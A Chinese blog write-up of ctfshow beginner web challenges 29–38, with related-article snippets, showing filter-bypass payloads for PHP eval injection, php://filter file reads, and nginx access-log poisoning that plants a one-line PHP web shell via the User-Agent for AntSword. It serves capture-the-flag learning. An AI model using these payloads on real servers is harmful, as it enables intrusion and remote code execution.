ctfshow web入门 web29-web38

已于 2024-04-01 21:10:25 修改
阅读量639 收藏 9
点赞数 14
分类专栏: ctfshow 文章标签: web安全
于 2024-04-01 17:45:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/137224741
版权

web29

把flag和i屏蔽了

system函数也行但是通常会屏蔽所以我直接用passthru

看看有啥

cat的话要查看源代码

web30

没有意外把这个system屏蔽了没事我不用哈哈哈

?c=passthru("cat f*");

然后查看源代码

web31

把空格屏蔽了

某位大佬的题解看到的

%09或者/**/绕过

但是是在""里面所以我们还是直接%09吧

web32

php伪协议,最常用的两种命令

php://filter/read=convert.base64-encode/resource=index.php
php://filter/resource=index.php

查看文件内容(源代码)

构造

?c=include$_GET["cmd"]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

这里放两张我和大佬聊天的截图,真的很无语

加个http://

移动到最后发现有等号,base64解码

web33

双引号屏蔽了我不用就是了把刚才那个改一下

?c=include$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

web34

怎么看着和web33的一模一样

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

可以用

base64解码

web35

说实话不认真比对真的看不出来有啥区别,这次多了一个等号

?c=include$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

但是我抱着试一试的情况把他做出来了

web36

屏蔽了数字

但是我的payload根本就没有数字哇,继续用,都已经是套娃了家人们

?c=include$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

得吃php伪协议

web37

日志文件包含

思路:include文件包含,利用日志文件包含

?c=/var/log/nginx/access.log   (访问日志文件

打开hackbar,

user agent传马

<?php eval($_POST['a']);?>

antsword链接

到手,之前做过日志文件包含所以我看到自己的题解找到的这个"?c=/var/log/nginx/access.log"

就是方便

web38

一样的做法,一个不用的步骤都没有,中途操作有问题的评论或者私聊帮你解决
 

baozongwi
关注
  • 14
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow-web入门-爆破(web26,27,28)
HkD01L的博客
06-20 1016
ctfshow web26 web27 web28
ctfshow-web入门-爆破web25
HkD01L的博客
06-20 779
mt_srand()是伪随机,通过分发种子,如果有种子的话,生成随机数的值也是固定的,生成的值也和php的版本有关,ctfshow,web25,爆破
CTFshow 命令执行 web29 30 31
ChenD的学习笔记
11-08 1399
CTFshow 命令执行 web29 web30 web31
CTFshow 命令执行 web29-web40
m0_73121489的博客
06-25 258
过滤了反引号、左括号和分号,passthru、printf和echo都用不了,取反绕过也不行,多过滤了php和file,PHP伪协议用不了,只能用data协议。BP抓包,用HackBar传参之后没有内容回显。这题解法也差不多,数字换成字母就可以了。过滤了system,php,flag。涉及到一点文件包含,只过滤了flag。然后在源码里就可以看到flag。base64解码即得flag。法一:php://input。很简单,就过滤了flag。新姿势:嵌套文件包含。和web32一个解法。和web32一个解法。
ctfshow-web入门-命令执行(web29)五种解法绕过文件名检测
最新发布
Welcome To Myon'Blog !
06-06 472
它的 payload 里用到了两个连续的单引号,在一些系统中,连续的两个单引号会被解释为一个单引号,而不会被视为字符串的结尾,从而使得字符串拼接在一起。因此,"fl''ag.php" 被解释为 "flag.php",从而绕过对文件名的检测。第一题代码很简单,就是对 preg_match 绕过,只要提交的参数值不出现 flag 就行。这条命令的作用是输出指定文件的内容,并在每一行前面加上行号。可以看到 flag 就在当前目录下,叫 flag.php。写入成功,这里还是测了一会儿才弄好,注意对单引号的转义。
ctfshow-WEB入门-命令执行 (WEB29~WEB44)
weixin_40103894的博客
11-28 627
ctfshow-WEB入门-命令执行 (WEB29~WEB44)
CTFshow web(命令执行29-36)
csjjjd的博客
02-07 1332
磨刀不误砍柴工,看了我之前的文章后,车速自然要加快,10分钟八道题转瞬即逝,苦于篇幅太长,剩下内容在下一篇文章。因为CTFshow后面flag不输出来的基本都藏在flag.php所以之后没有必要直接system(ls);当然你要用我文章其他命令也可以,都是降维打击的,是不是很爽!第二个命令就搞定了,接下来直接base64解码就好!,那直接第二条就搞定了。
CTFshow_web入门_命令执行_web29~54
ScyLamb的博客
02-07 1666
0x00 web29 if(!preg_match("/flag/i", $c)){ 只过滤flag【不区分大小写】 ?c=system('ls'); ?c=system('cat `ls`'); 预期解:echo `nl fl''ag.php`; 0x01 web30 if(!preg_match("/flag|system|php/i", $c)){ 过滤了文件名、一个系统命令执行函数、php【不区分大小写】 ?c=passthru('ls'); ?c=passthru("nl fl''ag.
ctfshow-命令执行-web29
weixin_43400535的博客
10-28 1492
ctfshow-web30 题目描述: 原理: isset() 函数 用于检测变量是否已设置并且非 NULL。 如果已经使用 unset() 释放了一个变量之后,再通过 isset() 判断将返回 FALSE。 若使用 isset() 测试一个被设置成 NULL 的变量,将返回 FALSE。 同时要注意的是 null 字符("\0")并不等同于 PHP 的 NULL 常量 语法:bool isset ( mixed $var [, mixe
ctfshow web29-web40
m0_73721944的博客
04-22 784
1=php://filter/convert.base64-encode/resource=flag.php:使用GET请求传递参数"1",该参数的值为php://filter/convert.base64-encode/resource=flag.php。这是一种特殊的文件包含方式,其中php://filter用于对文件进行过滤和转换,convert.base64-encode表示将文件内容进行Base64编码,而resource=flag.php指定了要读取的文件为flag.php。
CTFSHOW WEB入门 命令执行 web29-web36
m0_53194713的博客
06-26 1306
ctfshow web29 web30 web31
CTFshow刷题日记-WEB-命令执行上29-55
Love&Share
09-03 9086
类型一: 变量c来接受并过滤传入的数据,eval函数来执行 web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag,使用*号,通配符绕过即可 /?c=system("cat%20fla
ctfshow WEB入门 命令执行29-77&118-122&124
byname1的博客
01-20 1111
可以看出这是一个二维数组。
CTFSHOW web入门——web29
m0_74093152的博客
04-23 221
preg_match正则匹配,如果输入的c中含有flag字段就不会将c作为代码执行,即过滤flag。构造payload:?用GET方式获取参数c,然后利用eval函数将c作为代码执行。查看网页源代码获得flag。
ctfshow-web入门——命令执行(1)(web29-web40)
m0_62905745的博客
03-16 878
本篇文章是ctfshow的web入门部分的命令执行部分wp(web29-web 40),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
ctfshow web入门 命令执行web29-web57详解
2401_84009597的博客
04-12 654
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
ctf.show web入门(命令执行)29~56
qq_61768489的博客
01-27 3013
web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } preg_match()函数学习一下: preg_match函数是进行正则表达式的匹配,成功返回1,否则返回0 在这个正则里边有一个参数是i,这个在正则
ctfshow web入门 web11
12-12
根据提供的引用内容,我们可以得知ctfshow web入门系列共有20道题目,其中web11是其中的一道题目。由于没有提供具体的题目描述,我无法给出具体的解答。但是,我可以为您提供一些解决CTF Web题目的一般性建议: 1.了解Web基础知识,例如HTTP协议、HTML、CSS、JavaScript等。 2.学习Web漏洞,例如SQL注入、XSS、CSRF等。 3.掌握一些常用的Web工具,例如Burp Suite、sqlmap、dirbuster等。 4.多练习,多尝试,多思考。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值